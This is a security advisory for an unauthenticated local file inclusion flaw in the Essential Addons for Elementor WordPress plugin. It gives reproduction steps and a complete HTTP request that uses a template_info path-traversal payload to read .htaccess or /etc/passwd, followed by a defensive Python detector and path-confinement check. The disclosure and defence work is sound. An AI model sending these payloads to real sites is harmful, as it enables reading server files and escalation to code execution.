Source: wpexploit | Author: Wai Yan Myo Thet | WPEX-ID: 0D02B222-E672-4AC0-A1D4-D34E1ECF4A95
History: Jan 31, 2022 - 12:00 a.m.

Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

Published: 2022-01-31 00:00:00
Author: Wai Yan Myo Thet
Tags: elementor, unauthenticated, lfi, security, vulnerability, ajax, exploit, product grid

EPSS: 0.003
Percentile: 65.5%

The plugin does not validate or sanitise some template data before using it in include statements, which could allow unauthenticated attackers to perform a Local File Inclusion attack and read arbitrary files on the server. This could also lead to RCE via user-uploaded files or other LFI-to-RCE techniques.

- Create a simple page and edit it with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget; it is disabled by default)
- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter to a payload such as ../../../../../../.htaccess or ../../../../../../../../etc/passwd (the template_info[name] parameter is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected.
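The following is an added example, not part of the advisory or the plugin's code. It shows two defender-side checks for the issue described above: a request inspector that flags template_info values carrying path components in the load_more and ajax_eael_product_gallery actions (usable in a WAF hook or when reviewing captured POST bodies), and the confinement check a template loader should apply before an include. The base directory, the sample bodies and the assumption that the loader simply joins dir and file_name under a templates directory are constructed for this example; the plugin's real path layout is not shown on the page.

```python
"""Inspect admin-ajax.php request bodies for template_info traversal and
show the path-confinement check an include side should perform."""
import os
from urllib.parse import parse_qs

# Parameters the advisory names as reaching the include statement.
TEMPLATE_KEYS = ("template_info[file_name]", "template_info[name]", "template_info[dir]")
# AJAX actions the advisory lists as affected.
AFFECTED_ACTIONS = {"load_more", "ajax_eael_product_gallery"}


def suspicious_template_values(body: str) -> dict:
    """Return {param: value} for template_info fields that are not a plain
    template name: any path separator, '..', NUL byte, absolute path or blank."""
    params = parse_qs(body, keep_blank_values=True)  # decodes %5B / %2f etc.
    if not AFFECTED_ACTIONS & set(params.get("action", [])):
        return {}
    flagged = {}
    for key in TEMPLATE_KEYS:
        for value in params.get(key, []):
            norm = value.replace("\\", "/")
            if ("/" in norm or ".." in norm or "\x00" in value
                    or norm.startswith("/") or not norm.strip()):
                flagged[key] = value
    return flagged


def resolve_template(base_dir: str, dir_name: str, file_name: str):
    """Confinement check: resolve the candidate path and require that it
    still lies under base_dir; return None otherwise (assumed loader layout)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, dir_name, file_name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed sample bodies; the first mirrors the request quoted in the advisory.
ATTACK_BODY = ("action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid"
               "&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d"
               "&template_info%5Bdir%5D=lite"
               "&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess"
               "&template_info%5Bname%5D=Post-Grid")
BENIGN_BODY = ("action=load_more&template_info%5Bdir%5D=lite"
               "&template_info%5Bfile_name%5D=default&template_info%5Bname%5D=Post-Grid")

if __name__ == "__main__":
    print(suspicious_template_values(ATTACK_BODY))  # flags template_info[file_name]
    print(suspicious_template_values(BENIGN_BODY))  # {}
    print(resolve_template("/srv/www/plugin/templates", "lite", "../../../../etc/passwd"))  # None
```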
